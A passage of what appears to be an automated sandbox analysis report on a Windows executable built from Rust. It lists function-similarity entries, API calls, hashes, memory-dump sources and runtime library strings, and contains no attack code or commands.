                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID:
                                            • API String ID: 4250714341-0
                                            • Opcode ID: 070e3caf87f64f2a3c91a436f6b6ccd2b0e289e79cc6a2614e82e0a8743353d6
                                            • Instruction ID: 66d775dc8f74948e8a7cd11dcdb9050969988f3f445e66b33699241a37de01d5
                                            • Opcode Fuzzy Hash: 070e3caf87f64f2a3c91a436f6b6ccd2b0e289e79cc6a2614e82e0a8743353d6
                                            • Instruction Fuzzy Hash: ECD1BE72A08BC685EB60CB16E0947EE77A8FB85780F484175DA8C937A9DF3DD545C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: Pending error polled more than once$tv
                                            • API String ID: 3510742995-625553725
                                            • Opcode ID: 336ac07c414207f2772f25bff619ea6701e0f8c96156e50cb271b35bf5756e0f
                                            • Instruction ID: 9ad4780df2aa6ac790479842f8db04193e1d0e43bdc8ece0d9a289dde14bb19c
                                            • Opcode Fuzzy Hash: 336ac07c414207f2772f25bff619ea6701e0f8c96156e50cb271b35bf5756e0f
                                            • Instruction Fuzzy Hash: F8918C72A08BC285E760CB12E0947EE77A4FB85784F494176EA8CA379ADF3DE545C700
                                            APIs
                                            • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65441D7AB
                                            Strings
                                            • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF65441DB3C, 00007FF65441DB9F
                                            • assertion failed: (*tail).value.is_none()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.30\src\mpsc\queue.rs, xrefs: 00007FF65441D80D
                                            • assertion failed: (*next).value.is_some(), xrefs: 00007FF65441DB5B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake
                                            • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.30\src\mpsc\queue.rs$called `Result::unwrap()` on an `Err` value
                                            • API String ID: 3114109732-2716327383
                                            • Opcode ID: e4cd79852d18799fd38237284644d538e6bb5d31325ae9413fe5d87046187475
                                            • Instruction ID: f6d540608c6e5eaf862db2a2abb083193c6490bf7f6ed57c52fe651ebc02790d
                                            • Opcode Fuzzy Hash: e4cd79852d18799fd38237284644d538e6bb5d31325ae9413fe5d87046187475
                                            • Instruction Fuzzy Hash: DCF1C1A2A4DF8281EA529B15D4E037A27A0EF84B94F0C14B6DE9DA3399DF3CF455C340
                                            APIs
                                            Strings
                                            • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF65439343E, 00007FF6543934A1
                                            • assertion failed: (*tail).value.is_none()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.30\src\mpsc\queue.rs, xrefs: 00007FF65439311D
                                            • assertion failed: (*next).value.is_some(), xrefs: 00007FF65439345D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake
                                            • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.30\src\mpsc\queue.rs$called `Result::unwrap()` on an `Err` value
                                            • API String ID: 3114109732-2716327383
                                            • Opcode ID: 8b7284980b738f64f0932e3e6211d587ced7649af2fb4823e84164b72fad4491
                                            • Instruction ID: d95295bc2e043e9676915c43a21ce2f78a0e6159f5e97eecf96cbbe85d124eb8
                                            • Opcode Fuzzy Hash: 8b7284980b738f64f0932e3e6211d587ced7649af2fb4823e84164b72fad4491
                                            • Instruction Fuzzy Hash: 3CE18062A0DB4280EA619F16E4E437E67A0EF49F84F5D00B5DA9DA33A5DF3DE445C340
                                            APIs
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6543B71A0,?,?,?,?,?,?,?,?,00007FF6543B730A), ref: 00007FF6543B6EE0
                                            • memcpy.MSVCRT ref: 00007FF6543B6EEE
                                            • memcpy.MSVCRT ref: 00007FF6543B6F22
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6543B71A0,?,?,?,?,?,?,?,?,00007FF6543B730A), ref: 00007FF6543B6F48
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6543B71A0,?,?,?,?,?,?,?,?,00007FF6543B730A), ref: 00007FF6543B6F59
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6543B71A0,?,?,?,?,?,?,?,?,00007FF6543B730A), ref: 00007FF6543B6FC6
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6543B71A0,?,?,?,?,?,?,?,?,00007FF6543B730A), ref: 00007FF6543B6FDC
                                            • HeapFree.KERNEL32(?,?,?,?,00007FF6543B6CC3), ref: 00007FF6543B710D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1887603139-2333694755
                                            • Opcode ID: e9ffb224ae75c035f78797c8229804cd20542bb7f7850c6dc3ef8f153e9eeb81
                                            • Instruction ID: 9e1bc68a4484c7560577e1f3c361f30d7b857e7065a6c9c114a57b48dcdda61f
                                            • Opcode Fuzzy Hash: e9ffb224ae75c035f78797c8229804cd20542bb7f7850c6dc3ef8f153e9eeb81
                                            • Instruction Fuzzy Hash: A371C262A09B5281E605DB53E8A03B967A0EF49FD4F4C80B5DE4DA77A6DF3CE146C340
                                            APIs
                                            Strings
                                            • overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 00007FF6543A5EDF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap$AddressSingleWakememcmpmemset
                                            • String ID: overflow when adding duration to instantlibrary\std\src\time.rs
                                            • API String ID: 1268825411-3002242212
                                            • Opcode ID: ad158985b5e62cc4662021a5fb6b568b514f56d05ba7cdb18a5016096f2e6fdc
                                            • Instruction ID: 45c41a34e6b1300852f7cfa7059f04d280fe6eece78582e23ae93eea09c326ca
                                            • Opcode Fuzzy Hash: ad158985b5e62cc4662021a5fb6b568b514f56d05ba7cdb18a5016096f2e6fdc
                                            • Instruction Fuzzy Hash: 36422D32618BC582EB718B16F4943EAB3A4FB85344F544165DBCDA2BA5DF3DE188CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: QueryVirtual
                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                            • API String ID: 1804819252-1534286854
                                            • Opcode ID: 40a03011fe3292d90b47b0693047ca9dc91b358f706ccceebf14de5ba78093d5
                                            • Instruction ID: 32175dd9853c6507d3fcb9cac9531872e940969fa3b5217d198e0f65b5d53b9b
                                            • Opcode Fuzzy Hash: 40a03011fe3292d90b47b0693047ca9dc91b358f706ccceebf14de5ba78093d5
                                            • Instruction Fuzzy Hash: 3F51B172A09A4682EF109F11E8A07B977A0FB89B94F4C41B1DE4DA7795DE3CE446C740
                                            APIs
                                            Strings
                                            • overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 00007FF65439D4E8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID: overflow when adding duration to instantlibrary\std\src\time.rs
                                            • API String ID: 4250714341-3002242212
                                            • Opcode ID: 92a894196e0e0d3570e88633aced9d60702ac8a049c34ec2f1914fbed3fe73d1
                                            • Instruction ID: e3a5fca9f4d1db98561c1f4451cc9c3c51a73be6c15488401bd949802c95fdaf
                                            • Opcode Fuzzy Hash: 92a894196e0e0d3570e88633aced9d60702ac8a049c34ec2f1914fbed3fe73d1
                                            • Instruction Fuzzy Hash: BEE1D622A19A4282FA759F16E4A13BD6360FF54BD0F488171DF8EA77A5DF3DE4858300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: assertion failed: slot.next.is_none()$invalid key
                                            • API String ID: 3510742995-195781097
                                            • Opcode ID: b093409f358ab3d5b0f9528084e70fefce56b0ad249e8285b96956f69d94322f
                                            • Instruction ID: 9a5bc587796f61928d23f5cdfc0bebf7c2239ef130c394293e3582d1055d4e38
                                            • Opcode Fuzzy Hash: b093409f358ab3d5b0f9528084e70fefce56b0ad249e8285b96956f69d94322f
                                            • Instruction Fuzzy Hash: BBF1AF32A09B8296E761CF15E4903EAB3A4FB84784F488175DB8D53BA5DF3CE195C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID:
                                            • API String ID: 4250714341-0
                                            • Opcode ID: 870078229a5efc3946b194157b289d09747e863c2fd6104a4aa69e0029f70b4c
                                            • Instruction ID: e8474191fe56d5af65daf42125cc1f98ab1668de50e2a9fc86210e78891fdd23
                                            • Opcode Fuzzy Hash: 870078229a5efc3946b194157b289d09747e863c2fd6104a4aa69e0029f70b4c
                                            • Instruction Fuzzy Hash: 66F1AF62A04F9585E7459F29E8913ED63B4FF48B88F089235DE8D63765EF38E195C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: d2c1012b0feea23002b76769a6207df10c51ee2a068945ed6eb6f3513e9cfd3f
                                            • Instruction ID: 601ca2353dbbd2c9467042c4697c9b405e7b1b853e4aeeb4b695edeb7fa8c564
                                            • Opcode Fuzzy Hash: d2c1012b0feea23002b76769a6207df10c51ee2a068945ed6eb6f3513e9cfd3f
                                            • Instruction Fuzzy Hash: 33513F22A08E5280E725DB16D4E43FD67A1EF89F94F4D40B6CA4DA77A9CF7CE5849300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID:
                                            • API String ID: 4250714341-0
                                            • Opcode ID: 455ac78f758034b9fbebc9b87940ed1497fedecbd2b1642e21792d11e3ab40f7
                                            • Instruction ID: a876e325bef0895dfc2920fd2caf11a797cbdc1da95a311f7945a12a5f87e3b2
                                            • Opcode Fuzzy Hash: 455ac78f758034b9fbebc9b87940ed1497fedecbd2b1642e21792d11e3ab40f7
                                            • Instruction Fuzzy Hash: 20A19C72A08BC681EA60CB16E0947AE77A8FB89780F494175EE8CA3795DF3DD544C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: index not found$invalid key
                                            • API String ID: 3510742995-2380169476
                                            • Opcode ID: 0680f54011438f1cc2500a0b6b2576a573d216c753702931f0c093e283412767
                                            • Instruction ID: b7f22f8bfde5d355ba1cb39c31fd09e8c4b04e8b3f57887d0367d37d749380b7
                                            • Opcode Fuzzy Hash: 0680f54011438f1cc2500a0b6b2576a573d216c753702931f0c093e283412767
                                            • Instruction Fuzzy Hash: 39F1F822E19B4681EB118F26D4A13AC6360EF55FC4F9882B6DA4DB77A1EF3CD585C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: cdc6706c07a447a4923b1d57a10c110e0e1ff211f207feb3488963a7e6225039
                                            • Instruction ID: af264bd85127522163950a8ac29adaa6c3b2ece2c0932c9d93e3838e0619040b
                                            • Opcode Fuzzy Hash: cdc6706c07a447a4923b1d57a10c110e0e1ff211f207feb3488963a7e6225039
                                            • Instruction Fuzzy Hash: 3A71412290CA8281E771D716D4A43FA6BA0EB85B98F4C40B6DA8DA77F6CF7CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 5eb5f65c0d03ba857201c773d9ebed9a5bd44a4024c13e5f1db52ec356eaa7ed
                                            • Instruction ID: 50f4a480ff1848da3f16ea0b207ba1b086454096e893b959f91ca794cfd3245b
                                            • Opcode Fuzzy Hash: 5eb5f65c0d03ba857201c773d9ebed9a5bd44a4024c13e5f1db52ec356eaa7ed
                                            • Instruction Fuzzy Hash: 4A61402290CA8281E771D726D4A43FA6BA0EB85B98F4C40B6D68DA77F6CF7CD544C740
                                            APIs
                                            Strings
                                            • 127.0.0.1:0C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-0.8.11\src\sys\windows\mod.rs, xrefs: 00007FF6544076BF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
